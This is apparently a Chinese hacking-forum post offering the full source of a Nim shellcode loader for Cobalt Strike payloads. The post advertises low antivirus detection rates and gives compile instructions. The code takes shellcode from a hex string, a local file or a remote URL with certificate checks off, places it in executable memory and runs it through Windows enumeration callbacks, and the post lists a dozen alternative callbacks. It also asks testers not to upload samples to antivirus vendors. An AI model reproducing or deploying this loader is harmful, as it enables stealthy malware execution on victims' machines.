nim-shellcode-loader[vt查杀3/67][微步云沙箱1/24]

使用方法

①可payload直接键入上线

注意:除了加载bin文件是不用额外操作之外 其他的加载方式都需要把payload中的\x删去

②可加载bin文件上线

即cs里面生成的raw

③可请求远程服务器获取payload

也可以请求github/gitee获取payload

注意:放在远程服务器上的必须是去掉\x的
如图所示:

查杀情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
import httpclient
import streams
import OpenSSL
import os
import strutils
import winim/lean
import osproc
import stew/byteutils
import net
proc shellcodeCallback(shellcode: openarray[byte]): void =
    echo "[*] T00ls.cc Nim-shellcode-loader shadowwolf"
    let CurrentProcess = GetCurrentProcessId()
    echo "[*] Target Process: ", CurrentProcess
    echo "[*] Length Of Shellcode: ", len(shellcode)
    echo "[+] Injecting!"
    discard """
    T00ls.cc 14454-shadowwolf
    """
    # Application for memory
    let rPtr = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    # Copy Shellcode to the allocated memory section
    copyMem(rPtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len))

    # Callback execution
    EnumSystemGeoID(
        16,
        0,
        cast[GEO_ENUMPROC](rPtr)
    ) 
proc RequestGet(url:string,header={"user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"}):string=
     type
        sslContext=ref object
     var 
        client = newHttpClient(sslContext=newContext(verifyMode=CVerifyNone))
        RequestHeaders=newHttpHeaders(header)
        resp=client.request(url,headers=RequestHeaders)
     return resp.bodyStream.readAll().replace("\\x"," ").replace(",","").replace(" ","")
#To get the shellcode on the website you put on
proc GetShellcodeAndRun(para:string):void=
    if("http" in para):
       echo "[*] Get the shellcode on the website:"&para
       let resp=RequestGet(para)#Get the shellcode on your website
       var shellcode = newSeq[byte](len(resp) div 2)#calc the length
       hexToByteArray(resp, shellcode)#convert hex string into array
       shellcodeCallback(shellcode)#execute
    elif fileExists(para):
        echo "[*] Get the file:"&para
        var 
            filename = para
            file: File
        file = open(filename, fmRead)
        var fileSize = file.getFileSize() 
        var shellcode = newSeq[byte](fileSize)
        discard file.readBytes(shellcode, 0, fileSize)
        file.close()
        shellcodeCallback(shellcode)
    else:
        echo "[*] Get the string:"&para
        var hexstr: string = para
        var shellcode = newSeq[byte](len(hexstr) div 2)
        hexToByteArray(hexstr, shellcode)
        shellcodeCallback(shellcode)
if paramCount()>=1:
   var para:string=paramStr(1)
   GetShellcodeAndRun(para)

过火绒,360全家桶 要试的哥哥不要开上传样本 谢谢啦

编译生成exe: nim c –cpu:i386 -d:mingw -d:ssl –opt:size shellcode_loader.nim

gitee:https://gitee.com/oagi/nim_shellloader

源码中的EnumSystemGeoID回调函数可以换成以下函数 等价

1
2
3
4
5
6
7
8
9
10
11
12
13
# Callback execution
    EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①
    EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②
    EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③
    EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④
    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤
    EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥
    EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦
    EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧
    EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨
    EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩
    EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11
    EnumWindows(cast[WNDENUMPROC](rPtr), nil)#12